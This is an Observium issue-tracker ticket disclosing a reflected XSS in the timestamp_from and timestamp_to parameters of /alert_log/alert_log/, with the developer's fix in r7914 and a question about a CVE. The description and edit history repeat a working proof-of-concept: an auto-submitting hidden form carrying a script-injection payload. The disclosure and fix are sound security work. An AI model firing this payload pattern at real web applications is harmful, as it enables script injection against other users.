[OBS-1868] [Security] - Reflected XSS on /alert_log - Observium

Details

Type: Bug
Resolution: Fixed
Priority: Major
Fix Version/s: Professional Edition
Affects Version/s: Community Edition
Component/s: Security, Web Interface
Labels:
None

Description

Hello,

Parameters "timestamp_from" and "timestamp_to" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.

Proof Of Concept Code:

<form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">

    <input name="timestamp_from" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt;"/>

    <input name="timestamp_to" value=""/>

    <input name="device_id%5b%5d" value="3"/>

    <input name="alert_test_id%5b%5d" value="3"/>

    <input name="log_type%5b%5d" value="ALERT_NOTIFY"/>

</form>

<script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>

Regards
Himanshu

Attachments

Activity

[OBS-1868] [Security] - Reflected XSS on /alert_log

Mike Stupalov made changes - 2016/07/10 02:10 AM

Status

Original: Resolved [ 5 ]

New: Closed [ 6 ]

Himanshu Das added a comment - 2016/06/10 05:05 AM

@Mike Stupalov

Could you please let me know?

Himanshu Das added a comment - 2016/06/10 05:05 AM @Mike Stupalov Could you please let me know?

Mike Stupalov made changes - 2016/06/08 09:50 PM

Component/s

New: Security [ 10600 ]

Himanshu Das added a comment - 2016/06/08 09:50 PM

Hello Mike Stupalov,

Thanks for speedy fix.

I also want to know if there will be CVE assigned for this bug?

Regards
Himanshu

Himanshu Das added a comment - 2016/06/08 09:50 PM Hello Mike Stupalov, Thanks for speedy fix. I also want to know if there will be CVE assigned for this bug? Regards Himanshu

Mike Stupalov made changes - 2016/06/08 09:43 PM

Fix Version/s		New: Professional Edition [ 10001 ]
Resolution		New: Fixed [ 1 ]
Status	Original: Open [ 1 ]	New: Resolved [ 5 ]

Mike Stupalov added a comment - 2016/06/08 09:43 PM

Thank you for report!

Fixed in r7914.

Mike Stupalov added a comment - 2016/06/08 09:43 PM Thank you for report! Fixed in r7914.

Mike Stupalov made changes - 2016/06/08 07:53 PM

Description

Original: Hello,

Parameters "*timestamp_from*" and "*timestamp_to*" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.

Proof Of Concept Code:

<form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">
    <input name="timestamp_from" value="'"--></style></scRipt><scRipt>alert(1)</scRipt>"/>
    <input name="timestamp_to" value=""/>
    <input name="device_id%5b%5d" value="3"/>
    <input name="alert_test_id%5b%5d" value="3"/>
    <input name="log_type%5b%5d" value="ALERT_NOTIFY"/>
</form>
<script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>

Regards
Himanshu

New: Hello,

Parameters "*timestamp_from*" and "*timestamp_to*" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.

Proof Of Concept Code:
{code}
<form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">
    <input name="timestamp_from" value="'"--></style></scRipt><scRipt>alert(1)</scRipt>"/>
    <input name="timestamp_to" value=""/>
    <input name="device_id%5b%5d" value="3"/>
    <input name="alert_test_id%5b%5d" value="3"/>
    <input name="log_type%5b%5d" value="ALERT_NOTIFY"/>
</form>
<script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
{code}
Regards
Himanshu

Mike Stupalov made changes - 2016/06/08 07:48 PM

Assignee

Original: Adam Armstrong [ adama ]

New: Mike Stupalov [ landy ]

Himanshu Das created issue - 2016/06/08 05:27 PM

People

Assignee:: Mike Stupalov

Reporter:: Himanshu Das

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 2016/06/08 05:27 PM

Updated:: 2016/07/10 02:10 AM

Resolved:: 2016/06/08 09:43 PM